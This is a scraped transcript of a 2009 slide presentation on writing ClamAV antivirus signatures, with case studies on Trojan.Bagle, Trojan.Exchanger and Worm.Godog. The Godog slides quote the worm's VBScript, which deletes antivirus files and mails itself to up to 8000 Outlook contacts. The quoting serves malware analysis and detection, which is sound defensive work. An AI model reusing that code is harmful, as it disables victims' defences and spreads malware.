clamav signatures
TRANSCRIPT
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 1/35
Writing ClamAV Signatures
Alain ZidouembaMarch 4, 2009
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 2/35
2
About the presenter
Alain Zidouemba
• VRT Research Engineer for over a year
• Primary responsibilities:• Malware research & signatures generation – ClamAV
• Vulnerability research & rules generation – Snort
• Before Sourcefire: Anti-Malware Research Engineer
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 3/35
3
Outline
What is ClamAVWhere to get ClamAV
Different ClamAV signature formats:
• .hdb
• .mdb
• .ndb
• .ldb
WhitelistingQ & A
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 5/35
5
What is ClamAV?
Clam AntiVirus (ClamAV) is an open source(GPL) anti-virus toolkit for UNIX, designedespecially for e-mail scanning on mail gateways
Provides a number of utilities including:
• A flexible and scalable multi-threaded daemon(clamd)
• A command line scanner (clamscan)
• An advanced tool for automatic database updates
(freshclam)• Sigtool – more later
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 6/35
6
Where can I get ClamAV from?
Latest stable release: ClamAV 0.94.2• http://www.clamav.net/download/sources
Most popular UNIX operating systems aresupported:
• GNU/Linux, Solaris, FreeBSD, OpenBSD, Mac OS X
Up-to-date list of binary packages is availableat our website:
•
http://clamav.net/download/packages
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 7/35
7
Why learn how to write sigs?
I thought Sourcefire released signaturesupdates several times a day!
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 8/35
8
ClamAV malware detection
Goal: recognize and block malware
Detection is:
• File-centric
• Focus on recognizing malicious code in file
Not intended to replace desktop AV
First line of defense
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 9/35
9
ClamAV Virus Database (CVD)
The ClamAV project distributes two CVD files• main.cvd
• daily.cvd
Sigtool (ships with ClamAV) can display
detailed information on CVD files:
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 10/35
10
Various signature files in .cvdarchive
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 11/35
Writing signatures for ClamAV
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 12/35
12
Hash database: *.hdb
The format for .hdb files is as follows:• MD5:Size:MalwareName
To create a signature for test.exe use the --md5option of sigtool:
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 13/35
13
Hash database: *.hdb (cont’d)
That’s it! The signature is ready to be used:
• The name for the detection can be changed:
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 14/35
14
MD5, PE-section based: *.mdb
The format for .mdb files is as follows: • PESectionSize:MD5:MalwareName
The easiest way to generate MD5 basedsection signatures is to extract target PE
sections into separate files and then run sigtoolwith the option -- mdb:
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 15/35
15
Case study: Trojan.Bagle-328
IDA Pro indicates that the sample is “packed”
Packed with Themida (as per PEiD)
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 16/35
16
Case study: Trojan.Bagle-328(cont'd)
Themida is used by malware writers...butalso by legitimate products – false positivelikely
We can use pe-sig , a Ruby script that willcreate sigs for each section of a PE file:
Finally, the signature is:• 237568:ce914ca1bbea795a7021854431663623:Trojan.Bagle-328
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 17/35
17
Extended sig. format: *.ndb
The format for .ndb files is as follows: • MalwareName:TargetType:Offset:HexSignature
TargetType is one of the following numbersspecifying the type of the target file:
0: Any file 4: Mail File
1: Portable Executable 5: Graphics
2: OLE2 component (eg: VBA script) 6: ELF3: HTML (normalized) 7: ASCII text file (normalized)
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 18/35
18
Case study: Trojan.Exchanger
Many files that are very similar yet different
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 19/35
19
Case study: Trojan.Exchanger (cont’d)
5.exe:
Opcode:• e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
Signature:• Trojan.Exchanger :1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
C d T j E h
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 20/35
20
Case study: Trojan.Exchanger (cont’d)
7.exe:
Opcode:• e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
Signature:• Trojan.Exchanger :1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
C t d T j E h
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 21/35
21
Case study: Trojan.Exchanger (cont’d)
Signature for 5.exe:• Trojan.Exchanger :1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
Signature for 7.exe:•
Trojan.Exchanger :1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
Signature to detect both 5.exe and 7.exe:• Trojan.Exchanger :1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
C t d T j E h
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 22/35
22
Case study: Trojan.Exchanger (cont’d)
Moreover, for 5.exe:• EP: 0x4094E0
• Binary string: 0x4095C5
For 7.exe:
• EP: 0x406D87
• Binary string: 0x406E6C
In both cases the distance between EP and our binary string is the same: 0xE5 = 229 (decimal)
C t d T j E h
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 23/35
23
Case study: Trojan.Exchanger (cont’d)
Finally we can rewrite the signature to be:• Trojan.Exchanger :1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
This signature is more precise and even
matches other samples:
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 24/35
24
Logical signatures: *.ldb
Logical signatures introduced in ClamAV 0.94 The format for .ldb files is as follows:
• SignatureName;TargetDescriptionBlock;LogicalExpr ession;Subsig0;Subsig1;Subsig2;...
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 25/35
25
Case study: Worm.Godog
A mass-mailer worm, code is in VBS
Registro = legion.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If FileExists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\Avp32.exe") then path = Registro &"\Kaspersky Lab\Kaspersky Antivirus Personal Pro"
legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\*.*")
If fileexists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\Avp32.exe") then path = Registro &"\Kaspersky Lab\Kaspersky Antivirus Personal"
legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\*.*")
if FileExists(Registro & "\Antiviral Toolkit Pro\avp32.exe") then path = Registros & "\Antiviral Toolkit Pro"
legions.DeleteFile (Registro & "\Antiviral Toolkit Pro\*.*")
if fileexists (Registro & "\AVPersonal\Avguard.exe") then path = Registro & "\AVPersonal"
legions.DeleteFile (Registro & "\AVPersonal\*.*")
if fileexists (Registro & "\Trend PC-cillin 98\IOMON98.EXE") then path = Registro & "\Trend PC-cillin 98"
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.*")legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.EXE")
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.dll")
C t d W G d
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 26/35
26
Case study: Worm.Godog(cont’d)
After normalization, we can create 4 signaturesto detect each attempt to disable AV tools asfollows:
(0) Kaspersky Antivirus Personal/Kaspersky Antivirus Personal Pro: 66696c656578697374732028
{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c
{-100}2e64656c65746566696c652028
{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c
(1) Antiviral Toolkit Pro: 66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f
{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f
(2) AVPersonal: 66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028
{-25}202620225c6176706572736f6e616c
(3) Trend PC-cillin 98: 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e
{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e
C t d W G d
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 27/35
27
Case study: Worm.Godog(cont’d)
Worm also send itself to the first 8000 contactsfound in the address book:
Set Create = CreateObject ("Scripting.FileSystemObject")
Set mail = Create.CreateTextFile("C:\mail.vbs")
mail.writeline "On Error Resume Next"
mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E"
mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")"
mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")"
mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")"mail.writeline "For A = 1 To Mail.AddressLists.Count"
mail.writeline "Set B = Mail.AddressLists (A)"
mail.writeline "Counter = 1"
mail.writeline "Set C = leg.CreateItem (0)"
mail.writeline "For D = 1 To B.AddressEntries.Count"
mail.writeline "E = B.AddressEntries (Counter)"
mail.writeline "C.Recipients.Add E"
mail.writeline "Counter = Counter + 1"
mail.writeline "If Counter > 8000 Then Exit For"
mail.writeline "Next"
mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34)
mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34)
mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:\Legion.vbs" & Chr(34)
mail.writeline "C.DeleteAfterSubmit = True"
mail.writeline "C.Send"
mail.writeline "Next"
mail.Close
legion.Run ("C:\mail.vbs")
C t d W G d
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 28/35
28
Case study: Worm.Godog(cont’d)
A signature to detect this worm portion of thefile could be:
(4) 666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74
{-100}726563697069656e74732e616464{-100}696620{-10}203e20
{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464
{-150}2e73656e64
Finally, we can write this highly flexiblesignature:• Worm.Godog;Target:0;((0|1|2|3)& (4));(0);(1);(2);(3);(4)
in a .ldb file:Worm.Godog;Target:0;((0|1|2|3)& (4));66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c ;66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f;66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c;66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e;666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 29/35
29
Whitelisting
To whitelist a specific file create an entry in adatabase file with the extension of .fp followingthe MD5 signature format:
• MD5:FileSize:Comment
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 30/35
30
Whitelisting (cont’d)
To whitelist a specific signature insidemain.cvd add the following entry into a localfile local.ign:• db_name:line_number :signature_name
To ignore the “ myTestSignature” at line 23 intest.ndb:
• test.ndb:23:myTestSignature
Daily.ign:
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 31/35
31
More questions?
[email protected] - user questions
[email protected] - technicaldiscussions
Alternatively you can try asking on the#clamav IRC channel on irc.freenode.net
If you have questions or comments on this
presentation: [email protected]
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 32/35
32
ClamAV/VRT/Sourcefire
Websites• http://www.clamav.net
• http://www.snort.org
• htttp://www.sourcefire.com
Blogs
• http://clam-av.blogspot.com
•
http://vrt-sourcefire.blogspot.com
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 33/35
33
Contribute
Sample submission• http://www.clamav.net/sendvirus/
Upload statistics:
• freshclam --submit-stats
Bug submission
• http://bugs.clamav.net
7/30/2019 Clamav signatures
http://slidepdf.com/reader/full/clamav-signatures 34/35
Q & A
NOW GO AND WRITE